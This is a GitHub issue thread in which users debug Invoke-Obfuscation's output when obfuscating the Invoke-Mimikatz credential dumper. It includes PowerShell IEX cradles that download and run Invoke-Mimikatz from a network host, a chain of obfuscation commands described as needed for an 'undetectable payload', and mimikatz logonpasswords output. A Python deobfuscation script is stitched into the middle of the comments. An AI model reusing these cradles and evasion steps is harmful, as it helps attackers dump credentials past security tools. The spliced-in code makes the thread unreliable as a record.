Comments (16)
Hi byt3bl33d3r, glad to hear you like this project! Thanks for submitting this bug report. It seems that string obfuscation for ParameterSetName fields in parameter bindings (but not DefaultParameterSetName fields) is causing errors when concatenation or even -f format operator reordering is performed (even if encapsulated with curly braces as a script block). I don't recall seeing this causing errors before for PS2 through PS5, but it definitely is not working at this point.
I just pushed an updated Out-ObfuscatedTokenCommand.ps1 file (e6b01ed) that includes a string token fix as well as a variable token fix.
I am no longer seeing the above errors with Invoke-Mimikatz on either PS2 or PS5. Would you mind re-testing your scenario(s) and letting me know if this resolves your issues? Curious if there is more to the errors that you're seeing.
Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet
from invoke-obfuscation.
Just re-tested, now seeing the following errors, let me know if I'm missing something.
Windows 7 (PS v2)
IEX cradle now throws a different error, running the cmdlet still errors out.
PS C:\Users\yomama> IEX (New-Object Net.Webclient).DownloadString('http://192.16
8.10.3/Invoke-Mimikatz.ps1')
Invoke-Expression : Missing closing ')' in expression.
At line:1 char:4
+ IEX <<<< (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invo
ke-Mimikatz.ps1')
+ CategoryInfo : ParserError: (CloseParenToken:TokenId) [Invoke-E
xpression], ParseException
+ FullyQualifiedErrorId : MissingEndParenthesisInExpression,Microsoft.Powe
rShell.Commands.InvokeExpressionCommand
PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Import-Module .\test.ps1
PS C:\Users\yomama\Downloads\Invoke-Obfuscation-master> Invoke-Mimikatz
The variable '$COmmAND' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2657 char:35
+ ${E`x`EARgs} = ${COmm`AND} <<<<
+ CategoryInfo : InvalidOperation: (COmmAND:Token) [], RuntimeExc
eption
+ FullyQualifiedErrorId : VariableIsUndefined
The variable '$eXEaRgS' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:173
+ &("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motESc`RIP
t`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id','Vo'
), 0, "", ${eX`Ea`RgS} <<<< )
+ CategoryInfo : InvalidOperation: (eXEaRgS:Token) [], RuntimeExc
eption
+ FullyQualifiedErrorId : VariableIsUndefined
Array assignment failed because index '0' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2547 char:22
+ ${pEB`Y`Tes}[ <<<< 0] = 0
+ CategoryInfo : InvalidOperation: (0:Int32) [], RuntimeException
+ FullyQualifiedErrorId : IndexOutOfRange
Array assignment failed because index '1' was out of range.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2548 char:22
+ ${peBY`T`Es}[ <<<< 1] = 0
+ CategoryInfo : InvalidOperation: (1:Int32) [], RuntimeException
+ FullyQualifiedErrorId : IndexOutOfRange
inVoke-mEMORYLOaDLiBraRY : Cannot bind argument to parameter 'PeBYteS' because
it is an empty array.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2552 char:94
+ ${Pel`oAdeD`iNfo} = &("{2}{3}{0}{1}{4}" -f'-Memo','ry','Invo','ke
','LoadLibrary') -PEBytes <<<< ${pe`By`TEs} -ExeArgs ${e`xeAR`gs}
+ CategoryInfo : InvalidData: (:) [inVoke-mEMORYLOaDLiBraRY], Par
ameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyArrayNotAll
owed,inVoke-mEMORYLOaDLiBraRY
The variable '$PeLOADEDiNfo' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2558 char:25
+ if (${PeL`O`ADEDi`Nfo} <<<< -eq ${I1`qo}::"z`eRo")
+ CategoryInfo : InvalidOperation: (PeLOADEDiNfo:Token) [], Runti
meException
+ FullyQualifiedErrorId : VariableIsUndefined
The variable '$pELoADEDinFO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2563 char:36
+ ${PE`han`Dle} = ${p`E`LoADEDinFO} <<<< [0]
+ CategoryInfo : InvalidOperation: (pELoADEDinFO:Token) [], Runti
meException
+ FullyQualifiedErrorId : VariableIsUndefined
The variable '$pELOaDediNfO' cannot be retrieved because it has not been set.
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2564 char:44
+ ${Rem`O`TepEhA`NDle} = ${pE`LOaDed`i`NfO} <<<< [1]
+ CategoryInfo : InvalidOperation: (pELOaDediNfO:Token) [], Runti
meException
+ FullyQualifiedErrorId : VariableIsUndefined
Invoke-Command : PEHandle is null or IntPtr.Zero
At C:\Users\yomama\Downloads\Invoke-Obfuscation-master\test.ps1:2674 char:4
+ & <<<< ("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motE
Sc`RIPt`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id
','Vo'), 0, "", ${eX`Ea`RgS})
+ CategoryInfo : OperationStopped: (PEHandle is null or IntPtr.Ze
ro:String) [Invoke-Command], RuntimeException
+ FullyQualifiedErrorId : PEHandle is null or IntPtr.Zero,Microsoft.PowerS
hell.Commands.InvokeCommandCommand
Windows 8.1 (PS v4)
Seems to be the same error as last time.
PS C:\Users\yomama1> IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.3/Invoke-Mimikatz.ps1')
PS C:\Users\yomama1> Invoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+ ${vIR`T`UalALLOC} = (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+ ${m`E`mCPy} = ( varIabLE ("{1}{0}"-f 'Fpq','76') -va )::("{4}{5}{0}{3}{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+ ${lOAd`L`I`BRARy} = ( geT-VaRIaBLe ("76"+"fpQ") -ValueoNl )::("{6}{1}{3}{5 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+ ${V`IRTu`AlfRE`EEX} = ( geT-VARiaBLe ("{1}{0}" -f'PQ','76F') -vaL )::("{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+ ${virTUA`LP`R`oTE`CT} = ( GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+ ${cREAtET`HRE`Ad} = (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:428 char:3
+ ${vIR`T`UalALLOC} = (GEt-VariABLE ("{0}{1}"-f'76F','pQ') -VaLUeO)::("{4}{5}{1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:438 char:3
+ ${m`E`mCPy} = ( varIabLE ("{1}{0}"-f 'Fpq','76') -va )::("{4}{5}{0}{3}{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:448 char:3
+ ${lOAd`L`I`BRARy} = ( geT-VaRIaBLe ("76"+"fpQ") -ValueoNl )::("{6}{1}{3}{5 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:468 char:3
+ ${V`IRTu`AlfRE`EEX} = ( geT-VARiaBLe ("{1}{0}" -f'PQ','76F') -vaL )::("{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:473 char:3
+ ${virTUA`LP`R`oTE`CT} = ( GEt-VariAble ("{1}{0}" -f '6FPq','7') -Value )::( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At line:556 char:9
+ ${cREAtET`HRE`Ad} = (vARIAbLE ("{0}{1}"-f'7','6FpQ') -VaLuEoNL )::("{2} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
You cannot call a method on a null-valued expression.
At line:2212 char:5
+ ${P`eHAN`dLe} = ${w`in`32fun`cTions}."vIRt`Ua`LaLl`oC"."i`Nv`oKe"(${loAd`AD` ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new
PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might
be free).
At line:2224 char:4
+ Throw ("{13}{10}{18}{0}{30}{16}{14}{47}{50}{48}{4}{45}{43}{44}{12}{49}{41}{7} ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (VirtualAlloc fa...might be free).:String) [], RuntimeException
+ FullyQualifiedErrorId : VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running
the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the ad
dress the PE wants might be free).
from invoke-obfuscation.
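The obfuscated statements quoted in the error output above combine three token-level transformations: backtick insertion, `-f` format-operator reordering and string concatenation. The following Python is an added example, not code from this thread or from Invoke-Obfuscation: it undoes those three transformations on logged script lines so that plain keyword matching works again. The function names and the watchlist are assumptions, and the sample lines are copied from the output above with console line wraps rejoined and truncated tails dropped.

```python
import re

# A single-quoted PowerShell string literal ('' is an escaped quote).
SQ = r"'(?:[^']|'')*'"
ARG_RE = re.compile(SQ)
# ("{2}{1}{0}" -f 'a','b','c')  ->  group 2 = format string, group 3 = argument list
FORMAT_RE = re.compile(
    r"""\(\s*(["'])((?:[^"'{}]|\{\d+\})*)\1\s*-f\s*(""" + SQ + r"(?:\s*,\s*" + SQ + r")*)\s*\)",
    re.IGNORECASE,
)
# "76"+"fpQ": two adjacent literals with no variable expansion or ticks inside.
CONCAT_RE = re.compile(r"""(["'])([^"'`$]*)\1\s*\+\s*(["'])([^"'`$]*)\3""")

# Hypothetical watchlist for this example; every term appears in the thread's output.
WATCHLIST = ("invoke-command", "invoke-memoryloadlibrary", "virtualalloc")

# Lines taken from the error output above (constructed list, wraps rejoined).
SAMPLES = [
    r'''&("{2}{1}{0}" -f '-Command','nvoke','I') -ScriptBlock ${RE`motESc`RIPt`Bl`Ock} -ArgumentList @(${PEB`YtES`64}, ${p`EBy`TES32}, ("{1}{0}" -f'id','Vo'), 0, "", ${eX`Ea`RgS})''',
    r'''${Pel`oAdeD`iNfo} = &("{2}{3}{0}{1}{4}" -f'-Memo','ry','Invo','ke','LoadLibrary') -PEBytes ${pe`By`TEs} -ExeArgs ${e`xeAR`gs}''',
    r'''${lOAd`L`I`BRARy} = ( geT-VaRIaBLe ("76"+"fpQ") -ValueoNl )''',
    r'''${P`eHAN`dLe} = ${w`in`32fun`cTions}."vIRt`Ua`LaLl`oC"."i`Nv`oKe"''',
]


def strip_ticks(text):
    """Drop backticks that do not start a real escape such as `n or `t
    (Windows PowerShell escape set; a simplification for log normalization)."""
    return re.sub(r"`(?=[^0abfnrtv`\r\n])", "", text)


def _format_sub(m):
    args = [a[1:-1].replace("''", "'") for a in ARG_RE.findall(m.group(3))]
    try:
        out = re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], m.group(2))
    except IndexError:
        return m.group(0)  # placeholder without a matching argument: leave untouched
    return "'" + out.replace("'", "''") + "'"


def _concat_sub(m):
    return "'" + m.group(2) + m.group(4) + "'"


def normalize(text, max_passes=10):
    """Resolve ticks once, then fold -f reordering and concatenation to a fixpoint."""
    text = strip_ticks(text)
    for _ in range(max_passes):
        new = CONCAT_RE.sub(_concat_sub, FORMAT_RE.sub(_format_sub, text))
        if new == text:
            break
        text = new
    return text


def hits(text):
    low = text.lower()  # also defeats the random-case layer
    return [k for k in WATCHLIST if k in low]


def triage(line):
    """Compare keyword matching before and after normalization."""
    clean = normalize(line)
    return {
        "raw_hits": hits(line),
        "hits": hits(clean),
        "ticks": line.count("`"),
        "format_ops": len(FORMAT_RE.findall(strip_ticks(line))),
        "normalized": clean,
    }


if __name__ == "__main__":
    for sample in SAMPLES:
        result = triage(sample)
        print(result["raw_hits"], "->", result["hits"], "|", result["normalized"])
```

High `ticks` and `format_ops` counts on a single line are themselves a useful signal, independent of whether any watchlist term is recovered.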
Can you provide some more information?
For the obfuscated version of Invoke-Mimikatz what obfuscation command(s) are you running? Something like this?
Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet
Also, if you run a LOCAL de-obfuscated version of Invoke-Mimikatz with your default download cradle in PS2.0 then you will get the "Missing closing ')' in expression" error depending on how you downloaded Invoke-Mimikatz.
For example, if you download via .DownloadFile then you won't get this error, but if you download via .DownloadString piped to a local file then you will get this error.
Download copy of Invoke-Mimikatz to disk
$LocalFile = 'c:\users\me\mimi.ps1'
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') > $LocalFile
Invoke local copy of Invoke-Mimikatz
IEX (New-Object Net.Webclient).DownloadString($LocalFile)
Above command should error on PS2.0
So it seems that this is a PS2.0 download cradle error depending on formatting of target local file, and not an issue of obfuscation being applied to Invoke-Mimikatz script.
For the remaining issue you stated, I just need more information for how you are obfuscating Invoke-Mimikatz, and what the difference is between Invoke-Mimikatz.ps1 and .\test.ps1 in your provided examples.
Thanks for your patience. I'll try my best to get these issues hammered as soon as I can.
from invoke-obfuscation.
Hey sorry for the late response,
Thanks for the clarification on the IEX cradle issue, will try that asap.
I ran the same invoke-obfuscation command as before
Invoke-Obfuscation -ScriptPath ./Invoke-Mimikatz.ps1 -Command "TOKEN,ALL,1,OUT test.ps1" -Quiet
There shouldn't be any difference between Invoke-Mimikatz.ps1 and test.ps1, one was obfuscated using Powershell on Linux and the other using Powershell 2.0 on Windows 7. I did that initially just to rule out the possibility of it being an issue obfuscating the script using Powershell on Linux.
Let me know if that cleared things up and if you need any more info.
from invoke-obfuscation.
Hi there,
I can give you some more detail from the tests I've been carrying out.
This is my PS version for Windows 10:
[17:53:09]:[..]/trialanderror$ $PSVersionTable
Name Value
---- -----
PSVersion 5.0.10586.672
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.10586.672
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
What I've done is run each Token obfuscation stage one after the other, making sure which one failed. After my tests I can tell you that both Type and Argument stages fail. The Argument stage gives an error similar to what @byt3bl33d3r shows for Windows 8.1 in his last message. The Type stage simply does not finish execution (obfuscation is fine, execution of obfuscated script is not).
Here's a review of everything I did:
cd C:\Users\newlog\Documents\tools\mimikatz\powershell\Invoke-Mimikatz\custom\trialanderror
Import-Module .\<script>.ps1
Invoke-Mimikatz -DumpCreds
#
# 1.mimi_comments.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\Invoke-Mimikatz.ps1' -Command 'Token\Comment\1' -Quiet > 1.mimi_comments.ps1
#
# 2.mimi_comments_whitespace.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\mimi_comments.ps1' -Command 'Token\Whitespace\1' -Quiet > 2.mimi_comments_whitespace.ps1
#
# 3.mimi_comments_whitespace_type.ps1 (EXECUTION DOES NOT WORK - IT DOES NOT FINISH)
#
$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Type\1' -Quiet > 3.mimi_comments_whitespace_type.ps1
#
# 4.mimi_comments_whitespace_variable.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Variable\1' -Quiet > 4.mimi_comments_whitespace_variable.ps1
#
# 5.mimi_comments_whitespace_variable_member.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\4.mimi_comments_whitespace_variable.ps1' -Command 'Token\Member\1' -Quiet > 5.mimi_comments_whitespace_variable_member.ps1
#
# 6.mimi_comments_whitespace_variable_member_argument.ps1 (EXECUTION DOES NOT WORK - ERROR MESSAGE)
#
$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Argument\1' -Quiet > 6.mimi_comments_whitespace_variable_member_argument.ps1
#
# 7.mimi_comments_whitespace_variable_member_command.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Command\1' -Quiet > 7.mimi_comments_whitespace_variable_member_command.ps1
#
# 8.mimi_comments_whitespace_variable_member_command_string.ps1
#
$ Invoke-Obfuscation -ScriptPath '.\7.mimi_comments_whitespace_variable_member_command.ps1' -Command 'Token\String\1' -Quiet > 8.mimi_comments_whitespace_variable_member_command_string.ps1
btw, the Argument stage is necessary to get an undetectable payload. Damn!
I attach the error message I get when Invoke-Mimikatz is obfuscated with the Argument stage:
error_msg.txt
So definitively, there's something not working as expected.
Awesome work @danielbohannon It's really amazing what you did here!
from invoke-obfuscation.
Are you still seeing these same issues with the latest commit? I'm still not able to reproduce this issue when applying these obfuscation steps (all level 1 obfuscation for each token type as you outlined above). Not sure what variable component I'm missing here but would love to help close this issue for you guys once I can reproduce it. Thanks for your help and patience.
from invoke-obfuscation.
Hi Daniel,
Thanks for this awesome project! I experience the same issue as @byt3bl33d3r. I obfuscate Invoke-Mimikatz from a Windows 10 1607 machine using your latest version 1.7 of Invoke-Obfuscation. Runs perfectly fine on the Windows 10 box:
PS C:\Users\MD\Documents\Invoke-Obfuscation-master> Import-Module .\MimiDogz_token.ps1
PS C:\Users\MD\Documents\Invoke-Obfuscation-master> INvoke-Mimikatz -DumpCreds
.#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 20 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 153000 (00000000:000255a8)
Session : Interactive from 1
--SNIP--
However, below is the output when running this same obfuscated script on a Windows Server 2012 box (PS4.0). Hope this is of use to you. Let me know if I can try anything else:
PS C:\Users\Administrator\Desktop> $PSVersionTable
Name Value
---- -----
PSVersion 4.0
WSManStackVersion 3.0
SerializationVersion 1.1.0.1
CLRVersion 4.0.30319.36366
BuildVersion 6.3.9600.17400
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0}
PSRemotingProtocolVersion 2.2
PS C:\Users\Administrator\Desktop> Import-Module MimiDogz_token.ps1
PS C:\Users\Administrator\Desktop> INvoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:438 char:3
+ ${m`EMCPY} = ( &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:508 char:9
+ ${Cre`A`Te`RE`mOTEtHRE`AD} = (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:438 char:3
+ ${m`EMCPY} = ( &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:508 char:9
+ ${Cre`A`Te`RE`mOTEtHRE`AD} = (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
